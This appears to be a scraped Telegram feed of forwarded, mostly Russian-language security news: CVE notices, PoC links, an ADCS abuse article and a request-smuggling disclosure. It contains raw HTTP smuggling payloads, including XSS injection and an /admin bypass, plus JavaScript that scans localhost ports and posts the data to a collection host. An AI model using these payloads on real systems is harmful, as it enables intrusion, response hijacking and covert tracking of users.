Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-0927 LPE
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
Forwarded from SecuriXy.kz
➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer).
📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.
🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!
💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.
📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC
📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.
🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!
💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.
📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC
0x6rss
CVE-2025-24071: NTLM Hash Leak
Technical explanation of NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
Forwarded from SecuriXy.kz
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.
https://qna.habr.com/q/465498
https://x.com/nightlind/status/911806158230495232
Вот скрипт:
https://jsfiddle.net/Lknb3xez/
Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.
Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC
5 Пробует подключиться к localhost на разных портах:
и др.
Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.
Совет один - Не открывайте доступ браузеру никуда…
https://qna.habr.com/q/465498
https://x.com/nightlind/status/911806158230495232
Вот скрипт:
https://jsfiddle.net/Lknb3xez/
Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.
Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC
5 Пробует подключиться к localhost на разных портах:
127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080
и др.
let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
let img = new Image();
img.onload = () => {
reportOpenPort(port);
};
img.onerror = () => {};
img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
method: 'POST',
body: JSON.stringify(collectedData)
});
Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.
Совет один - Не открывайте доступ браузеру никуда…
Хабр
Взлом гиганта: как я нашел уязвимость в поддомене Google и попал в «зал славы» багхантеров
Будни багхантера — это непрерывная охота за уязвимостями, успех в которой зависит не только от опыта и навыков, но и от банального везения. Недавно мне попалась по-настоящему крупная добыча: я...
🔗Ссылка:
https://habr.com/ru/post/889988/
https://habr.com/ru/post/889988/
Forwarded from RedTeam brazzers (Миша)
Друзья, всем прекрасный весенний вечер!
В моей голове давно была идея создания небольшого списка вариантов использования сертификатов в средах AD, помимо стандартного запроса билета и UnPAC The Hash. Так родилась небольшая статья на Medium, из которой вы узнаете про различные способы изучения полученного сертификата и нестандартные варианты его использования, как например для аутентификации по SSH или расшифровки HTTPS-траффика
Приятного чтения 🙂
https://cicada-8.medium.com/adcs-so-u-got-certificate-now-ive-got-nine-ways-to-abuse-it-861081cff082
В моей голове давно была идея создания небольшого списка вариантов использования сертификатов в средах AD, помимо стандартного запроса билета и UnPAC The Hash. Так родилась небольшая статья на Medium, из которой вы узнаете про различные способы изучения полученного сертификата и нестандартные варианты его использования, как например для аутентификации по SSH или расшифровки HTTPS-траффика
Приятного чтения 🙂
https://cicada-8.medium.com/adcs-so-u-got-certificate-now-ive-got-nine-ways-to-abuse-it-861081cff082
Medium
ADCS. So u got certificate. Now i’ve got nine ways to abuse it
What do with a certificate in a Windows AD environment? How to get the most out of a single pfx file? The answers are in article
Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда занимаешься баг баунти
😁2
Forwarded from SHADOW:Group
Раскрыли подробности
CVE-2024-33452. При обработке HTTP/1.1-запросов lua-nginx-module некорректно разбирает HEAD-запросы с телом, воспринимая тело запроса как новый отдельный запрос.Пример
Обычно прокси-серверы интерпретируют следующий HTTP-запрос как единый, поскольку GET
/smuggle находится в теле HEAD-запроса:HEAD / HTTP/1.1
Host: localhost
Content-Length: 52
GET /smuggle HTTP/1.1
Host: localhost
Однако lua-nginx-module интерпретирует его как два отдельных запроса, что приводит к рассинхронизации прокси-серверов в цепочке.
Сценарии атак
Прокси-серверы, использующие lua-nginx-module, уязвимы к этой атаке (например, Kong Gateway, Apache APISIX и другие).
Пример с Kong Gateway
Если Kong работает самостоятельно, уязвимость не представляет особой опасности. Но если Kong используется в связке с фронт-прокси (например, Nginx, Cloudflare и т. д.), злоумышленник может:
1. Внедрять вредоносные ответы (например, XSS-атаки).
2. Обходить защиту фронт-прокси (например, обход Cloudflare).
3. Перехватывать ответы других пользователей.
Этот сценарий позволяет заставить всех пользователей загрузить вредоносный ответ с XSS-кодом, даже если сайт использует обычную страницу Apache.
HEAD / HTTP/1.1
Host: localhost
Content-Length: 122
HEAD /app HTTP/1.1
Host: localhost
Connection: keep-alive
GET /app/assets?<script>alert(origin)</script> HTTP/1.1
X:
Результат: Все пользователи, отправляющие обычные запросы, получат XSS-скрипт в ответе.
Допустим, Cloudflare блокирует доступ к
/admin. Злоумышленник может скрыть GET-запрос к /admin внутри HEAD-запроса и обойти защиту.Пример:
HEAD / HTTP/1.1
Host: victim.com
Content-Length: 40
GET /admin HTTP/1.1
Host: victim.com
Результат: Cloudflare не увидит GET-запрос, и злоумышленник сможет обойти защиту.
Этот метод позволяет рассинхронизировать очередь ответов на сервере и захватить ответы других пользователей.
Пример атаки
1. Атакующий отправляет HEAD-запрос с внедрённым GET-запросом.
2. Сервер ошибочно интерпретирует тело как отдельный запрос.
3. Ответ попадает не атакующему, а следующему пользователю, а атакующий может забрать ответ жертвы.
Подробности
Более подробное описание читайте в блоге по ссылке.
#web #hrs #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM